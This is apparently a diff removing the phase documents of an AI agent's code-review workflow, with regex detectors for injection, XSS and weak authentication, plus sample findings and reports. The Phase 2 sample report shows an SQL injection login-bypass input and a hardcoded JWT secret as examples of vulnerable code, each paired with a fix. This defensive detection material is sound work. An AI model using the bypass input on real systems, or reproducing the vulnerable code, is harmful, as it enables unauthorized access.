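  '.js': 'javascript', '.py': 'python',
  '.java': 'java', '.go': 'go',
};

function detectLanguage(file: string): string {
  const ext = file.slice(file.lastIndexOf('.'));
  return LANGUAGE_BY_EXT[ext] ?? 'unknown';
}

// Priority follows the Critical/High/Medium/Low buckets from Step 3;
// the path patterns are illustrative and should match the project layout.
function categorizePriority(file: string): 'critical' | 'high' | 'medium' | 'low' {
  if (/\/(auth|payment)\//.test(file)) return 'critical';
  if (/\/(api|db|database)\//.test(file)) return 'high';
  if (/\/(utils|services)\//.test(file)) return 'medium';
  return 'low';
}
```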
|
||||
|
||||
## Output
|
||||
|
||||
### File Inventory
|
||||
|
||||
Save to `.code-review/inventory.json`:
|
||||
|
||||
```json
|
||||
{
|
||||
"scan_date": "2024-01-15T10:30:00Z",
|
||||
"total_files": 247,
|
||||
"by_language": {
|
||||
"typescript": 185,
|
||||
"python": 42,
|
||||
"javascript": 15,
|
||||
"go": 5
|
||||
},
|
||||
"by_priority": {
|
||||
"critical": 12,
|
||||
"high": 45,
|
||||
"medium": 120,
|
||||
"low": 70
|
||||
},
|
||||
"files": [
|
||||
{
|
||||
"path": "src/auth/login.ts",
|
||||
"language": "typescript",
|
||||
"loc": 245,
|
||||
"functions": 8,
|
||||
"classes": 2,
|
||||
"priority": "critical",
|
||||
"framework": "express",
|
||||
"dependencies": ["bcrypt", "jsonwebtoken", "express"]
|
||||
}
|
||||
]
|
||||
}
|
||||
```
|
||||
|
||||
### Summary Report
|
||||
|
||||
```markdown
|
||||
## Code Discovery Summary
|
||||
|
||||
**Scope**: src/**/*
|
||||
**Total Files**: 247
|
||||
**Languages**: TypeScript (75%), Python (17%), JavaScript (6%), Go (2%)
|
||||
|
||||
### Priority Distribution
|
||||
- Critical: 12 files (authentication, payment processing)
|
||||
- High: 45 files (API endpoints, database queries)
|
||||
- Medium: 120 files (utilities, services)
|
||||
- Low: 70 files (types, configs)
|
||||
|
||||
### Key Areas Identified
|
||||
1. **Authentication Module** (src/auth/) - 12 files, 2,400 LOC
|
||||
2. **Payment Processing** (src/payment/) - 5 files, 1,200 LOC
|
||||
3. **API Layer** (src/api/) - 35 files, 5,600 LOC
|
||||
4. **Database Layer** (src/db/) - 8 files, 1,800 LOC
|
||||
|
||||
**Next Phase**: Security Analysis on Critical + High priority files
|
||||
```
|
||||
|
||||
## State Management
|
||||
|
||||
Save phase state for potential resume:
|
||||
|
||||
```json
|
||||
{
|
||||
"phase": "01-code-discovery",
|
||||
"status": "completed",
|
||||
"timestamp": "2024-01-15T10:35:00Z",
|
||||
"output": {
|
||||
"inventory_path": ".code-review/inventory.json",
|
||||
"total_files": 247,
|
||||
"critical_files": 12,
|
||||
"high_files": 45
|
||||
}
|
||||
}
|
||||
```
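A minimal sketch of how a later run might consume this state to support `--resume`; the field names follow the example above, while the file path (`.code-review/state.json`) and the skip logic are assumptions:

```typescript
import { existsSync, readFileSync } from 'fs';

interface PhaseState {
  phase: string;
  status: 'completed' | 'in_progress' | 'failed';
  output?: { inventory_path?: string };
}

// Returns true when Phase 1 already completed and its inventory can be reused.
function canSkipDiscovery(statePath = '.code-review/state.json'): boolean {
  if (!existsSync(statePath)) return false;
  const state: PhaseState = JSON.parse(readFileSync(statePath, 'utf8'));
  return state.phase === '01-code-discovery' && state.status === 'completed';
}
```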
|
||||
|
||||
## Agent Instructions
|
||||
|
||||
```markdown
|
||||
You are in Phase 1 of the Code Review workflow. Your task is to discover and categorize code files.
|
||||
|
||||
**Instructions**:
|
||||
1. Use mcp__ccw_tools__smart_search with action="find_files" to discover files
|
||||
2. Apply exclusion patterns from config or arguments
|
||||
3. Categorize files by language, type, and priority
|
||||
4. Extract basic metadata (LOC, complexity indicators)
|
||||
5. Save inventory to .code-review/inventory.json
|
||||
6. Generate summary report
|
||||
7. Proceed to Phase 2 with critical + high priority files
|
||||
|
||||
**Tools Available**:
|
||||
- mcp__ccw_tools__smart_search (file discovery)
|
||||
- Read (read configuration and sample files)
|
||||
- Write (save inventory and reports)
|
||||
|
||||
**Output Requirements**:
|
||||
- inventory.json with complete file list and metadata
|
||||
- Summary markdown report
|
||||
- State file for phase tracking
|
||||
```
|
||||
|
||||
## Error Handling
|
||||
|
||||
### No Files Found
|
||||
|
||||
```javascript
|
||||
if (filteredFiles.length === 0) {
|
||||
throw new Error(`No files found matching scope: ${scope}
|
||||
|
||||
Suggestions:
|
||||
- Check if scope pattern is correct
|
||||
- Verify exclude patterns are not too broad
|
||||
- Ensure project has code files in specified scope
|
||||
`);
|
||||
}
|
||||
```
|
||||
|
||||
### Large Codebase
|
||||
|
||||
```javascript
|
||||
if (filteredFiles.length > 1000) {
|
||||
console.warn(`⚠️ Large codebase detected (${filteredFiles.length} files)`);
|
||||
console.log(`Consider using --scope to review in batches`);
|
||||
|
||||
// Offer to focus on critical/high priority only
|
||||
const answer = await askUser("Review critical/high priority files only?");
|
||||
if (answer === 'yes') {
|
||||
filteredFiles = filteredFiles.filter(f =>
|
||||
f.priority === 'critical' || f.priority === 'high'
|
||||
);
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
## Validation
|
||||
|
||||
Before proceeding to Phase 2:
|
||||
|
||||
- ✅ Inventory file created
|
||||
- ✅ At least one file categorized as critical or high priority
|
||||
- ✅ Metadata extracted for all files
|
||||
- ✅ Summary report generated
|
||||
- ✅ State saved for resume capability
|
||||
|
||||
## Next Phase
|
||||
|
||||
**Phase 2: Security Analysis** - Analyze critical and high priority files for security vulnerabilities using OWASP Top 10 and CWE Top 25 checks.
|
||||
@@ -1,442 +0,0 @@
|
||||
# Phase 2: Security Analysis
|
||||
|
||||
## Objective
|
||||
|
||||
Analyze code files for security vulnerabilities based on OWASP Top 10, CWE Top 25, and language-specific security patterns.
|
||||
|
||||
## Input
|
||||
|
||||
- **File Inventory**: From Phase 1 (`.code-review/inventory.json`)
|
||||
- **Priority Focus**: Critical and High priority files (unless `--scope all`)
|
||||
- **User Arguments**:
|
||||
- `--focus security`: Security-only mode
|
||||
- `--severity critical,high,medium,low`: Minimum severity to report
|
||||
- `--checks`: Specific security checks to run (e.g., sql-injection, xss)
|
||||
|
||||
## Process
|
||||
|
||||
### Step 1: Load Security Rules
|
||||
|
||||
```javascript
|
||||
// Load security check definitions
|
||||
const securityRules = {
|
||||
owasp_top_10: [
|
||||
'injection',
|
||||
'broken_authentication',
|
||||
'sensitive_data_exposure',
|
||||
'xxe',
|
||||
'broken_access_control',
|
||||
'security_misconfiguration',
|
||||
'xss',
|
||||
'insecure_deserialization',
|
||||
'vulnerable_components',
|
||||
'insufficient_logging'
|
||||
],
|
||||
cwe_top_25: [
|
||||
'cwe-79', // XSS
|
||||
'cwe-89', // SQL Injection
|
||||
'cwe-20', // Improper Input Validation
|
||||
'cwe-78', // OS Command Injection
|
||||
'cwe-190', // Integer Overflow
|
||||
// ... more CWE checks
|
||||
]
|
||||
};
|
||||
|
||||
// Load language-specific rules
|
||||
const languageRules = {
|
||||
typescript: require('./rules/typescript-security.json'),
|
||||
python: require('./rules/python-security.json'),
|
||||
java: require('./rules/java-security.json'),
|
||||
go: require('./rules/go-security.json'),
|
||||
};
|
||||
```
|
||||
|
||||
### Step 2: Analyze Files for Vulnerabilities
|
||||
|
||||
For each file in the inventory, perform security analysis:
|
||||
|
||||
```javascript
|
||||
const findings = [];
|
||||
|
||||
for (const file of inventory.files) {
|
||||
if (file.priority !== 'critical' && file.priority !== 'high') continue;
|
||||
|
||||
// Read file content
|
||||
const content = await Read({ file_path: file.path });
|
||||
|
||||
// Run security checks
|
||||
const fileFindings = await runSecurityChecks(content, file, {
|
||||
rules: securityRules,
|
||||
languageRules: languageRules[file.language],
|
||||
severity: args.severity || 'medium'
|
||||
});
|
||||
|
||||
findings.push(...fileFindings);
|
||||
}
|
||||
```
|
||||
|
||||
### Step 3: Security Check Patterns
|
||||
|
||||
#### A. Injection Vulnerabilities
|
||||
|
||||
**SQL Injection**:
|
||||
```javascript
|
||||
// Pattern: String concatenation in SQL queries
|
||||
const sqlInjectionPatterns = [
|
||||
/\$\{.*\}.*SELECT/, // Template literal with SELECT
|
||||
/"SELECT.*\+\s*\w+/, // String concatenation
|
||||
/execute\([`'"].*\$\{.*\}.*[`'"]\)/, // Parameterized query bypass
|
||||
/query\(.*\+.*\)/, // Query concatenation
|
||||
];
|
||||
|
||||
// Check code
|
||||
for (const pattern of sqlInjectionPatterns) {
|
||||
const matches = content.matchAll(new RegExp(pattern, 'g'));
|
||||
for (const match of matches) {
|
||||
findings.push({
|
||||
type: 'sql-injection',
|
||||
severity: 'critical',
|
||||
line: getLineNumber(content, match.index),
|
||||
code: match[0],
|
||||
file: file.path,
|
||||
message: 'Potential SQL injection vulnerability',
|
||||
recommendation: 'Use parameterized queries or ORM methods',
|
||||
cwe: 'CWE-89',
|
||||
owasp: 'A03:2021 - Injection'
|
||||
});
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
**Command Injection**:
|
||||
```javascript
|
||||
// Pattern: Unsanitized input in exec/spawn
|
||||
const commandInjectionPatterns = [
|
||||
/exec\(.*\$\{.*\}/, // exec with template literal
|
||||
/spawn\(.*,\s*\[.*\$\{.*\}.*\]\)/, // spawn with unsanitized args
|
||||
/execSync\(.*\+.*\)/, // execSync with concatenation
|
||||
];
|
||||
```
|
||||
|
||||
**XSS (Cross-Site Scripting)**:
|
||||
```javascript
|
||||
// Pattern: Unsanitized user input in DOM/HTML
|
||||
const xssPatterns = [
|
||||
/innerHTML\s*=.*\$\{.*\}/, // innerHTML with template literal
|
||||
/dangerouslySetInnerHTML/, // React dangerous prop
|
||||
/document\.write\(.*\)/, // document.write
|
||||
/<\w+.*\$\{.*\}.*>/, // JSX with unsanitized data
|
||||
];
|
||||
```
|
||||
|
||||
#### B. Authentication & Authorization
|
||||
|
||||
```javascript
|
||||
// Pattern: Weak authentication
|
||||
const authPatterns = [
|
||||
/password\s*===?\s*['"]/, // Hardcoded password comparison
|
||||
/jwt\.sign\(.*,\s*['"][^'"]{1,16}['"]\)/, // Weak JWT secret
|
||||
/bcrypt\.hash\(.*,\s*[1-9]\s*\)/, // Low bcrypt rounds
|
||||
/md5\(.*password.*\)/, // MD5 for passwords
|
||||
/if\s*\(\s*user\s*\)\s*\{/, // Missing auth check
|
||||
];
|
||||
|
||||
// Check for missing authorization
|
||||
const authzPatterns = [
|
||||
/router\.(get|post|put|delete)\(.*\)\s*=>/, // No middleware
|
||||
/app\.use\([^)]*\)\s*;(?!.*auth)/, // Missing auth middleware
|
||||
];
|
||||
```
|
||||
|
||||
#### C. Sensitive Data Exposure
|
||||
|
||||
```javascript
|
||||
// Pattern: Sensitive data in logs/responses
|
||||
const sensitiveDataPatterns = [
|
||||
/(password|secret|token|key)\s*:/i, // Sensitive keys in objects
|
||||
/console\.log\(.*password.*\)/i, // Password in logs
|
||||
/res\.send\(.*user.*password.*\)/, // Password in response
|
||||
/(api_key|apikey)\s*=\s*['"]/i, // Hardcoded API keys
|
||||
];
|
||||
```
|
||||
|
||||
#### D. Security Misconfiguration
|
||||
|
||||
```javascript
|
||||
// Pattern: Insecure configurations
|
||||
const misconfigPatterns = [
|
||||
/cors\(\{.*origin:\s*['"]?\*['"]?.*\}\)/, // CORS wildcard
|
||||
/https?\s*:\s*false/, // HTTPS disabled
|
||||
/helmet\(\)/, // helmet() used without explicit configuration
|
||||
/strictMode\s*:\s*false/, // Strict mode disabled
|
||||
];
|
||||
```
|
||||
|
||||
### Step 4: Language-Specific Checks
|
||||
|
||||
**TypeScript/JavaScript**:
|
||||
```javascript
|
||||
const jsFindings = [
|
||||
checkPrototypePollution(content),
|
||||
checkEvalUsage(content),
|
||||
checkUnsafeRegex(content),
|
||||
checkWeakCrypto(content),
|
||||
];
|
||||
```
|
||||
|
||||
**Python**:
|
||||
```javascript
|
||||
const pythonFindings = [
|
||||
checkPickleVulnerabilities(content),
|
||||
checkYamlUnsafeLoad(content),
|
||||
checkSqlAlchemy(content),
|
||||
checkFlaskSecurityHeaders(content),
|
||||
];
|
||||
```
|
||||
|
||||
**Java**:
|
||||
```javascript
|
||||
const javaFindings = [
|
||||
checkDeserialization(content),
|
||||
checkXXE(content),
|
||||
checkPathTraversal(content),
|
||||
checkSQLInjection(content),
|
||||
];
|
||||
```
|
||||
|
||||
**Go**:
|
||||
```javascript
|
||||
const goFindings = [
|
||||
checkRaceConditions(content),
|
||||
checkSQLInjection(content),
|
||||
checkPathTraversal(content),
|
||||
checkCryptoWeakness(content),
|
||||
];
|
||||
```
|
||||
|
||||
## Output
|
||||
|
||||
### Security Findings File
|
||||
|
||||
Save to `.code-review/security-findings.json`:
|
||||
|
||||
```json
|
||||
{
|
||||
"scan_date": "2024-01-15T11:00:00Z",
|
||||
"total_findings": 24,
|
||||
"by_severity": {
|
||||
"critical": 3,
|
||||
"high": 8,
|
||||
"medium": 10,
|
||||
"low": 3
|
||||
},
|
||||
"by_category": {
|
||||
"injection": 5,
|
||||
"authentication": 3,
|
||||
"data_exposure": 4,
|
||||
"misconfiguration": 6,
|
||||
"xss": 3,
|
||||
"other": 3
|
||||
},
|
||||
"findings": [
|
||||
{
|
||||
"id": "SEC-001",
|
||||
"type": "sql-injection",
|
||||
"severity": "critical",
|
||||
"file": "src/auth/user-service.ts",
|
||||
"line": 145,
|
||||
"column": 12,
|
||||
"code": "const query = `SELECT * FROM users WHERE username = '${username}'`;",
|
||||
"message": "SQL Injection vulnerability: User input directly concatenated in SQL query",
|
||||
"cwe": "CWE-89",
|
||||
"owasp": "A03:2021 - Injection",
|
||||
"recommendation": {
|
||||
"description": "Use parameterized queries to prevent SQL injection",
|
||||
"fix_example": "const query = 'SELECT * FROM users WHERE username = ?';\ndb.execute(query, [username]);"
|
||||
},
|
||||
"references": [
|
||||
"https://owasp.org/www-community/attacks/SQL_Injection",
|
||||
"https://cwe.mitre.org/data/definitions/89.html"
|
||||
]
|
||||
}
|
||||
]
|
||||
}
|
||||
```
|
||||
|
||||
### Security Report
|
||||
|
||||
Generate markdown report:
|
||||
|
||||
```markdown
|
||||
# Security Analysis Report
|
||||
|
||||
**Scan Date**: 2024-01-15 11:00:00
|
||||
**Files Analyzed**: 57 (Critical + High priority)
|
||||
**Total Findings**: 24
|
||||
|
||||
## Severity Summary
|
||||
|
||||
| Severity | Count | Percentage |
|
||||
|----------|-------|------------|
|
||||
| Critical | 3 | 12.5% |
|
||||
| High | 8 | 33.3% |
|
||||
| Medium | 10 | 41.7% |
|
||||
| Low | 3 | 12.5% |
|
||||
|
||||
## Critical Findings (Requires Immediate Action)
|
||||
|
||||
### 🔴 [SEC-001] SQL Injection in User Authentication
|
||||
|
||||
**File**: `src/auth/user-service.ts:145`
|
||||
**CWE**: CWE-89 | **OWASP**: A03:2021 - Injection
|
||||
|
||||
**Vulnerable Code**:
|
||||
\`\`\`typescript
|
||||
const query = \`SELECT * FROM users WHERE username = '\${username}'\`;
|
||||
const user = await db.execute(query);
|
||||
\`\`\`
|
||||
|
||||
**Issue**: User input (`username`) is concatenated directly into the SQL query, allowing attackers to inject malicious SQL commands.
|
||||
|
||||
**Attack Example**:
|
||||
\`\`\`
|
||||
username: ' OR '1'='1' --
|
||||
Result: SELECT * FROM users WHERE username = '' OR '1'='1' --'
|
||||
Effect: Bypasses authentication, returns all users
|
||||
\`\`\`
|
||||
|
||||
**Recommended Fix**:
|
||||
\`\`\`typescript
|
||||
// Use parameterized queries
|
||||
const query = 'SELECT * FROM users WHERE username = ?';
|
||||
const user = await db.execute(query, [username]);
|
||||
|
||||
// Or use ORM
|
||||
const user = await User.findOne({ where: { username } });
|
||||
\`\`\`
|
||||
|
||||
**References**:
|
||||
- [OWASP SQL Injection](https://owasp.org/www-community/attacks/SQL_Injection)
|
||||
- [CWE-89](https://cwe.mitre.org/data/definitions/89.html)
|
||||
|
||||
---
|
||||
|
||||
### 🔴 [SEC-002] Hardcoded JWT Secret
|
||||
|
||||
**File**: `src/auth/jwt.ts:23`
|
||||
**CWE**: CWE-798 | **OWASP**: A07:2021 - Identification and Authentication Failures
|
||||
|
||||
**Vulnerable Code**:
|
||||
\`\`\`typescript
|
||||
const token = jwt.sign(payload, 'mysecret123', { expiresIn: '1h' });
|
||||
\`\`\`
|
||||
|
||||
**Issue**: JWT secret is hardcoded and weak (only 11 characters).
|
||||
|
||||
**Recommended Fix**:
|
||||
\`\`\`typescript
|
||||
// Use environment variable with strong secret
|
||||
const token = jwt.sign(payload, process.env.JWT_SECRET, {
|
||||
expiresIn: '1h',
|
||||
algorithm: 'HS256'
|
||||
});
|
||||
|
||||
// Generate strong secret (32+ bytes):
|
||||
// node -e "console.log(require('crypto').randomBytes(32).toString('hex'))"
|
||||
\`\`\`
|
||||
|
||||
---
|
||||
|
||||
## High Findings
|
||||
|
||||
### 🟠 [SEC-003] Missing Input Validation
|
||||
|
||||
**File**: `src/api/users.ts:67`
|
||||
**CWE**: CWE-20 | **OWASP**: A03:2021 - Injection
|
||||
|
||||
...
|
||||
|
||||
## Medium Findings
|
||||
|
||||
...
|
||||
|
||||
## Remediation Priority
|
||||
|
||||
1. **Critical (3)**: Fix within 24 hours
|
||||
2. **High (8)**: Fix within 1 week
|
||||
3. **Medium (10)**: Fix within 1 month
|
||||
4. **Low (3)**: Fix in next release
|
||||
|
||||
## Compliance Impact
|
||||
|
||||
- **PCI DSS**: 4 findings affect compliance (SEC-001, SEC-002, SEC-008, SEC-011)
|
||||
- **HIPAA**: 2 findings affect compliance (SEC-005, SEC-009)
|
||||
- **GDPR**: 3 findings affect compliance (SEC-002, SEC-005, SEC-007)
|
||||
```
|
||||
|
||||
## State Management
|
||||
|
||||
```json
|
||||
{
|
||||
"phase": "02-security-analysis",
|
||||
"status": "completed",
|
||||
"timestamp": "2024-01-15T11:15:00Z",
|
||||
"input": {
|
||||
"inventory_path": ".code-review/inventory.json",
|
||||
"files_analyzed": 57
|
||||
},
|
||||
"output": {
|
||||
"findings_path": ".code-review/security-findings.json",
|
||||
"total_findings": 24,
|
||||
"critical_count": 3,
|
||||
"high_count": 8
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
## Agent Instructions
|
||||
|
||||
```markdown
|
||||
You are in Phase 2 of the Code Review workflow. Your task is to analyze code for security vulnerabilities.
|
||||
|
||||
**Instructions**:
|
||||
1. Load file inventory from Phase 1
|
||||
2. Focus on Critical + High priority files
|
||||
3. Run security checks for:
|
||||
- OWASP Top 10 vulnerabilities
|
||||
- CWE Top 25 weaknesses
|
||||
- Language-specific security patterns
|
||||
4. Use smart_search with mode="ripgrep" for pattern matching
|
||||
5. Use mcp__ace-tool__search_context for semantic security pattern discovery
|
||||
6. Classify findings by severity (Critical/High/Medium/Low)
|
||||
7. Generate security-findings.json and markdown report
|
||||
8. Proceed to Phase 3 (Best Practices Review)
|
||||
|
||||
**Tools Available**:
|
||||
- mcp__ccw_tools__smart_search (pattern search)
|
||||
- mcp__ace-tool__search_context (semantic search)
|
||||
- Read (read file content)
|
||||
- Write (save findings and reports)
|
||||
- Grep (targeted pattern matching)
|
||||
|
||||
**Output Requirements**:
|
||||
- security-findings.json with detailed findings
|
||||
- Security report in markdown format
|
||||
- Each finding must include: file, line, severity, CWE, OWASP, fix recommendation
|
||||
- State file for phase tracking
|
||||
```
|
||||
|
||||
## Validation
|
||||
|
||||
Before proceeding to Phase 3:
|
||||
|
||||
- ✅ All Critical + High priority files analyzed
|
||||
- ✅ Findings categorized by severity
|
||||
- ✅ Each finding has fix recommendation
|
||||
- ✅ CWE and OWASP mappings included
|
||||
- ✅ Security report generated
|
||||
- ✅ State saved
|
||||
|
||||
## Next Phase
|
||||
|
||||
**Phase 3: Best Practices Review** - Analyze code quality, performance, and maintainability issues.
|
||||
@@ -1,36 +0,0 @@
|
||||
# Phase 3: Best Practices Review
|
||||
|
||||
## Objective
|
||||
|
||||
Analyze code for best practices violations including code quality, performance issues, and maintainability concerns.
|
||||
|
||||
## Input
|
||||
|
||||
- **File Inventory**: From Phase 1 (`.code-review/inventory.json`)
|
||||
- **Security Findings**: From Phase 2 (`.code-review/security-findings.json`)
|
||||
- **User Arguments**:
|
||||
- `--focus best-practices`: Best practices only mode
|
||||
- `--check quality,performance,maintainability`: Specific areas to check
|
||||
|
||||
## Process
|
||||
|
||||
### Step 1: Code Quality Analysis
|
||||
|
||||
Check naming conventions, function complexity, code duplication, and dead code.
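A minimal sketch of one of these checks (naming conventions for function declarations); the regexes and severity are illustrative, not the skill's actual rules:

```typescript
// Flags function declarations whose names are not camelCase.
function findNamingViolations(content: string, file: string) {
  const findings: Array<{ type: string; category: string; severity: string; file: string; message: string }> = [];
  for (const match of content.matchAll(/function\s+([A-Za-z_$][\w$]*)/g)) {
    const name = match[1];
    if (!/^[a-z][A-Za-z0-9]*$/.test(name)) {
      findings.push({
        type: 'naming-convention',
        category: 'code_quality',
        severity: 'low',
        file,
        message: `Function "${name}" is not camelCase`,
      });
    }
  }
  return findings;
}
```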
|
||||
|
||||
### Step 2: Performance Analysis
|
||||
|
||||
Detect N+1 queries, inefficient algorithms, and memory leaks.
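A minimal sketch of an N+1 heuristic (an awaited query call inside a loop body); the regex and method names are illustrative assumptions:

```typescript
// Flags `await <model>.findById/findOne/query(...)` inside a for-loop body.
function findNPlusOneCandidates(content: string, file: string) {
  const loopWithAwait =
    /for\s*\([^)]*\)\s*\{[^}]*await\s+\w+\.(findById|findOne|query)\(/g;
  return [...content.matchAll(loopWithAwait)].map(() => ({
    type: 'n-plus-one-query',
    category: 'performance',
    severity: 'high',
    file,
    message: 'Awaited database call inside a loop; consider a batch query',
  }));
}
```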
|
||||
|
||||
### Step 3: Maintainability Analysis
|
||||
|
||||
Check documentation coverage, test coverage, and dependency management.
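A minimal sketch of a documentation-coverage heuristic (the share of exported functions preceded by a JSDoc block); purely illustrative:

```typescript
// Rough ratio of documented exported functions to all exported functions.
function estimateDocCoverage(content: string): number {
  const exported = content.match(/export\s+(async\s+)?function\s+\w+/g) ?? [];
  const documented = content.match(/\*\/\s*export\s+(async\s+)?function\s+\w+/g) ?? [];
  return exported.length === 0 ? 1 : documented.length / exported.length;
}
```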
|
||||
|
||||
## Output
|
||||
|
||||
- best-practices-findings.json
|
||||
- Markdown report with recommendations
|
||||
|
||||
## Next Phase
|
||||
|
||||
**Phase 4: Report Generation**
|
||||
@@ -1,278 +0,0 @@
|
||||
# Phase 4: Report Generation
|
||||
|
||||
## Objective
|
||||
|
||||
Consolidate security and best practices findings into a comprehensive, actionable code review report.
|
||||
|
||||
## Input
|
||||
|
||||
- **Security Findings**: `.code-review/security-findings.json`
|
||||
- **Best Practices Findings**: `.code-review/best-practices-findings.json`
|
||||
- **File Inventory**: `.code-review/inventory.json`
|
||||
|
||||
## Process
|
||||
|
||||
### Step 1: Load All Findings
|
||||
|
||||
```javascript
|
||||
const securityFindings = JSON.parse(
|
||||
await Read({ file_path: '.code-review/security-findings.json' })
|
||||
);
|
||||
const bestPracticesFindings = JSON.parse(
|
||||
await Read({ file_path: '.code-review/best-practices-findings.json' })
|
||||
);
|
||||
const inventory = JSON.parse(
|
||||
await Read({ file_path: '.code-review/inventory.json' })
|
||||
);
|
||||
```
|
||||
|
||||
### Step 2: Aggregate Statistics
|
||||
|
||||
```javascript
|
||||
const stats = {
|
||||
total_files_reviewed: inventory.total_files,
|
||||
total_findings: securityFindings.total_findings + bestPracticesFindings.total_findings,
|
||||
by_severity: {
|
||||
critical: securityFindings.by_severity.critical,
|
||||
high: securityFindings.by_severity.high + bestPracticesFindings.by_severity.high,
|
||||
medium: securityFindings.by_severity.medium + bestPracticesFindings.by_severity.medium,
|
||||
low: securityFindings.by_severity.low + bestPracticesFindings.by_severity.low,
|
||||
},
|
||||
by_category: {
|
||||
security: securityFindings.total_findings,
|
||||
code_quality: bestPracticesFindings.by_category.code_quality,
|
||||
performance: bestPracticesFindings.by_category.performance,
|
||||
maintainability: bestPracticesFindings.by_category.maintainability,
|
||||
}
|
||||
};
|
||||
```
|
||||
|
||||
### Step 3: Generate Comprehensive Report
|
||||
|
||||
```markdown
|
||||
# Comprehensive Code Review Report
|
||||
|
||||
**Generated**: {timestamp}
|
||||
**Scope**: {scope}
|
||||
**Files Reviewed**: {total_files}
|
||||
**Total Findings**: {total_findings}
|
||||
|
||||
## Executive Summary
|
||||
|
||||
{Provide high-level overview of code health}
|
||||
|
||||
### Risk Assessment
|
||||
|
||||
{Calculate risk score based on findings}
|
||||
|
||||
### Compliance Status
|
||||
|
||||
{Map findings to compliance requirements}
|
||||
|
||||
## Detailed Findings
|
||||
|
||||
{Merge and organize security + best practices findings}
|
||||
|
||||
## Action Plan
|
||||
|
||||
{Prioritized list of fixes with effort estimates}
|
||||
|
||||
## Appendix
|
||||
|
||||
{Technical details, references, configuration}
|
||||
```
|
||||
|
||||
### Step 4: Generate Fix Tracking Checklist
|
||||
|
||||
Create actionable checklist for developers:
|
||||
|
||||
```markdown
|
||||
# Code Review Fix Checklist
|
||||
|
||||
## Critical Issues (Fix Immediately)
|
||||
|
||||
- [ ] [SEC-001] SQL Injection in src/auth/user-service.ts:145
|
||||
- [ ] [SEC-002] Hardcoded JWT Secret in src/auth/jwt.ts:23
|
||||
- [ ] [SEC-003] XSS Vulnerability in src/api/comments.ts:89
|
||||
|
||||
## High Priority Issues (Fix This Week)
|
||||
|
||||
- [ ] [SEC-004] Missing Authorization Check in src/api/admin.ts:34
|
||||
- [ ] [BP-001] N+1 Query Pattern in src/api/orders.ts:45
|
||||
...
|
||||
```
|
||||
|
||||
### Step 5: Generate Metrics Dashboard
|
||||
|
||||
```markdown
|
||||
## Code Health Metrics
|
||||
|
||||
### Security Score: 68/100
|
||||
- Critical Issues: 3 (-30 points)
|
||||
- High Issues: 8 (-2 points each)
|
||||
|
||||
### Code Quality Score: 75/100
|
||||
- High Complexity Functions: 2
|
||||
- Code Duplication: 5%
|
||||
- Dead Code: 3 instances
|
||||
|
||||
### Performance Score: 82/100
|
||||
- N+1 Queries: 3
|
||||
- Inefficient Algorithms: 2
|
||||
|
||||
### Maintainability Score: 70/100
|
||||
- Documentation Coverage: 65%
|
||||
- Test Coverage: 72%
|
||||
- Missing Tests: 5 files
|
||||
```
|
||||
|
||||
## Output
|
||||
|
||||
### Main Report
|
||||
|
||||
Save to `.code-review/REPORT.md`:
|
||||
|
||||
- Executive summary
|
||||
- Detailed findings (security + best practices)
|
||||
- Action plan with priorities
|
||||
- Metrics and scores
|
||||
- References and compliance mapping
|
||||
|
||||
### Fix Checklist
|
||||
|
||||
Save to `.code-review/FIX-CHECKLIST.md`:
|
||||
|
||||
- Organized by severity
|
||||
- Checkboxes for tracking
|
||||
- File:line references
|
||||
- Effort estimates
|
||||
|
||||
### JSON Summary
|
||||
|
||||
Save to `.code-review/summary.json`:
|
||||
|
||||
```json
|
||||
{
|
||||
"report_date": "2024-01-15T12:00:00Z",
|
||||
"scope": "src/**/*",
|
||||
"statistics": {
|
||||
"total_files": 247,
|
||||
"total_findings": 69,
|
||||
"by_severity": { "critical": 3, "high": 13, "medium": 30, "low": 23 },
|
||||
"by_category": {
|
||||
"security": 24,
|
||||
"code_quality": 18,
|
||||
"performance": 12,
|
||||
"maintainability": 15
|
||||
}
|
||||
},
|
||||
"scores": {
|
||||
"security": 68,
|
||||
"code_quality": 75,
|
||||
"performance": 82,
|
||||
"maintainability": 70,
|
||||
"overall": 74
|
||||
},
|
||||
"risk_level": "MEDIUM",
|
||||
"action_required": true
|
||||
}
|
||||
```
|
||||
|
||||
## Report Template
|
||||
|
||||
Full report includes:
|
||||
|
||||
1. **Executive Summary**
|
||||
- Overall code health
|
||||
- Risk assessment
|
||||
- Key recommendations
|
||||
|
||||
2. **Security Findings** (from Phase 2)
|
||||
- Critical/High/Medium/Low
|
||||
- OWASP/CWE mappings
|
||||
- Fix recommendations with code examples
|
||||
|
||||
3. **Best Practices Findings** (from Phase 3)
|
||||
- Code quality issues
|
||||
- Performance concerns
|
||||
- Maintainability gaps
|
||||
|
||||
4. **Metrics Dashboard**
|
||||
- Security score
|
||||
- Code quality score
|
||||
- Performance score
|
||||
- Maintainability score
|
||||
|
||||
5. **Action Plan**
|
||||
- Immediate actions (critical)
|
||||
- Short-term (1 week)
|
||||
- Medium-term (1 month)
|
||||
- Long-term (3 months)
|
||||
|
||||
6. **Compliance Impact**
|
||||
- PCI DSS findings
|
||||
- HIPAA findings
|
||||
- GDPR findings
|
||||
- SOC 2 findings
|
||||
|
||||
7. **Appendix**
|
||||
- Full findings list
|
||||
- Configuration used
|
||||
- Tools and versions
|
||||
- References
|
||||
|
||||
## State Management
|
||||
|
||||
```json
|
||||
{
|
||||
"phase": "04-report-generation",
|
||||
"status": "completed",
|
||||
"timestamp": "2024-01-15T12:00:00Z",
|
||||
"input": {
|
||||
"security_findings": ".code-review/security-findings.json",
|
||||
"best_practices_findings": ".code-review/best-practices-findings.json"
|
||||
},
|
||||
"output": {
|
||||
"report": ".code-review/REPORT.md",
|
||||
"checklist": ".code-review/FIX-CHECKLIST.md",
|
||||
"summary": ".code-review/summary.json"
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
## Agent Instructions
|
||||
|
||||
```markdown
|
||||
You are in Phase 4 (FINAL) of the Code Review workflow. Generate comprehensive report.
|
||||
|
||||
**Instructions**:
|
||||
1. Load security findings from Phase 2
|
||||
2. Load best practices findings from Phase 3
|
||||
3. Aggregate statistics and calculate scores
|
||||
4. Generate comprehensive markdown report
|
||||
5. Create fix tracking checklist
|
||||
6. Generate JSON summary
|
||||
7. Inform user of completion and output locations
|
||||
|
||||
**Tools Available**:
|
||||
- Read (load findings)
|
||||
- Write (save reports)
|
||||
|
||||
**Output Requirements**:
|
||||
- REPORT.md (comprehensive markdown report)
|
||||
